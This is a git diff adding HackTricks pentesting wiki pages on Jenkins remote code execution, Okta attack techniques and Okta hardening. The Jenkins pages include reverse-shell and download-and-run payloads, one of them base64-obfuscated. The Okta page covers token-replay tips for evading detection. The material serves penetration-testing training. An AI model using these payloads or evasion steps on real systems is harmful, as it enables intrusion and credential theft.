+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Creating a new Pipeline
+
+In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+
+![](<../../.gitbook/assets/image (235).png>)
+
+In the **Pipeline section** write the **reverse shell**:
+
+![](<../../.gitbook/assets/image (285).png>)
+
+```groovy
+pipeline {
+    agent any
+
+    stages {
+        stage('Hello') {
+            steps {
+                sh '''
+                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+                '''
+            }
+        }
+    }
+}
+```
+
+Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+
+![](<../../.gitbook/assets/image (228).png>)
+
+## Modifying a Pipeline
+
+If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
new file mode 100644
index 0000000000..b11c7dcb32
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -0,0 +1,62 @@
+# Jenkins RCE Creating/Modifying Project
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Creating a Project
+
+This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+
+1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
+2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
+3. Click **Build now**
+   1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
+   2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
+
+![](<../../.gitbook/assets/image (165).png>)
+
+## Modifying a Project
+
+Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+
+![](<../../.gitbook/assets/image (265).png>)
+
+If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+
+Or **try to access to the path** `/job/<proj-name>/configure` or `/me/my-views/view/all/job/<proj-name>/configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+
+## Execution
+
+If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+
+![](<../../.gitbook/assets/image (98).png>)
+
+Click on **Save** and **build** the project and your **command will be executed**.\
+If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
new file mode 100644
index 0000000000..786f873257
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -0,0 +1,89 @@
+# Jenkins RCE with Groovy Script
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Jenkins RCE with Groovy Script
+
+This is less noisy than creating a new project in Jenkins
+
+1. Go to _path\_jenkins/script_
+2. Inside the text box introduce the script
+
+```python
+def process = "PowerShell.exe <WHATEVER>".execute()
+println "Found text ${process.text}"
+```
+
+You could execute a command using: `cmd.exe /c dir`
+
+In **linux** you can do: **`"ls /".execute().text`**
+
+If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
+
+**Another useful groovy script** is (replace \[INSERT COMMAND]):
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = '[INSERT COMMAND]'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in linux
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in windows
+
+You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
+
+```python
+scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
+echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
+cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
+```
+
+### Script
+
+You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
+
+You can use MSF to get a reverse shell:
+
+```
+msf> use exploit/multi/http/jenkins_script_console
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md
new file mode 100644
index 0000000000..ebb5511bf4
--- /dev/null
+++ b/pentesting-ci-cd/okta-security/README.md
@@ -0,0 +1,143 @@
+# Okta Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+
+The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+
+* **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
+* **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
+* **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
+* **Universal Directory**: Enables centralized management of users, groups, and devices.
+* **API Access Management**: Secures and manages access to APIs.
+
+These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+
+{% hint style="danger" %}
+The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+{% endhint %}
+
+{% hint style="success" %}
+To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+{% endhint %}
+
+### Summary
+
+There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
+These users can be inside **groups**.\
+There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+
+Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+
+{% hint style="danger" %}
+The most powerful role is **Super Administrator**.
+
+If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+{% endhint %}
+
+## Attacks
+
+### Locating Okta Portal
+
+Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+
+### Login in Okta via Kerberos
+
+If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+
+Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+
+**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+
+### Hijacking Okta AD Agent
+
+This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+
+**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+
+### Hijacking AD As an Admin
+
+This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+
+**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+
+### Okta Fake SAML Provider
+
+**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+
+The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+
+### Phishing Okta Portal with Evilgnix
+
+In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+
+### Colleague Impersonation Attack
+
+The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+
+Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
+
+Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
+Therefore, the app should have this field enabled if it exists:
+
+<figure><img src="../../.gitbook/assets/image (175).png" alt=""><figcaption></figcaption></figure>
+
+I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+
+The best way to find out if you could impersonate anyone on each app would be to try it!
+
+## Evading behavioural detection policies <a href="#id-9fde" id="id-9fde"></a>
+
+Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+
+Key recommendations include:
+
+* **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
+* Ensure **consistent user-agent strings** between the client and replayed access tokens.
+* **Refrain from replaying** tokens from different users from the same IP address.
+* Exercise caution when replaying tokens against the Okta dashboard.
+* If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+
+## Okta Hardening
+
+Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+
+{% content-ref url="okta-hardening.md" %}
+[okta-hardening.md](okta-hardening.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
+* [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/okta-security/okta-hardening.md b/pentesting-ci-cd/okta-security/okta-hardening.md
new file mode 100644
index 0000000000..8061021637
--- /dev/null
+++ b/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -0,0 +1,225 @@
+# Okta Hardening
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Directory
+
+### People
+
+From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+
+For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+
+### Groups
+
+This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
+It's possible to see the **people included inside groups** and **apps assigned** to each group.
+
+Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+
+From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+
+### Devices
+
+Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+
+### Profile Editor
+
+Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
+
+Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+
+### Directory Integrations
+
+Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+
+I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+
+### Profile Sources
+
+A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+
+I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+
+## Customizations
+
+### Brands
+
+Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+
+Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+
+### SMS
+
+Nothing interesting here.
+
+### End-User Dashboard
+
+You can find here applications configured, but we will see the details of those later in a different section.
+
+### Other
+
+Interesting setting, but nothing super interesting from a security point of view.
+
+## Applications
+
+### Applications
+
+Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+
+In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+
+<figure><img src="../../.gitbook/assets/image (283).png" alt=""><figcaption></figcaption></figure>
+
+And you could see some more details about the app (like the password reveal feature, if it's enabled):
+
+<figure><img src="../../.gitbook/assets/image (220).png" alt=""><figcaption></figcaption></figure>
+
+## Identity Governance
+
+### Access Certifications
+
+Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+
+I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+
+## Security
+
+### General
+
+* **Security notification emails**: All should be enabled.
+* **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
+* **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
+* **User enumeration prevention**: Both should be enabled
+  * Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
+    * Self-Service Registration
+    * JIT flows with email authentication
+* **Okta ThreatInsight settings**: Log and enforce security based on threat level
+
+### HealthInsight
+
+Here is possible to find correctly and **dangerous** configured **settings**.
+
+### Authenticators
+
+Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+
+In the **Enrollment** tab you can see how the ones that are required or optinal:
+
+<figure><img src="../../.gitbook/assets/image (143).png" alt=""><figcaption></figcaption></figure>
+
+It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+
+### Authentication policies
+
+Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+
+Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+
+### Global Session Policy
+
+Here you can find the session policies assigned to different groups. For example:
+
+<figure><img src="../../.gitbook/assets/image (245).png" alt=""><figcaption></figcaption></figure>
+
+It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+
+### Identity Providers
+
+Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+
+On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+
+**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+
+### Delegated Authentication
+
+Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+
+Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+
+### Network
+
+A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+
+After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+
+From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+
+### Device Integrations
+
+* **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
+  * I haven't seen this used yet. TODO
+* **Notification services**: I haven't seen this used yet. TODO
+
+### API
+
+You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+
+The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+
+There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+
+## Workflow
+
+### Automations
+
+Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+
+For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+
+## Reports
+
+### Reports
+
+Download logs. They are **sent** to the **email address** of the current account.
+
+### System Log
+
+Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+
+### Import Monitoring
+
+This can **import logs from the other platforms** accessed with Okta.
+
+### Rate limits
+
+Check the API rate limits reached.
+
+## Settings
+
+### Account
+
+Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+
+### Downloads
+
+Here you can download Okta agents to sync Okta with other technologies.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
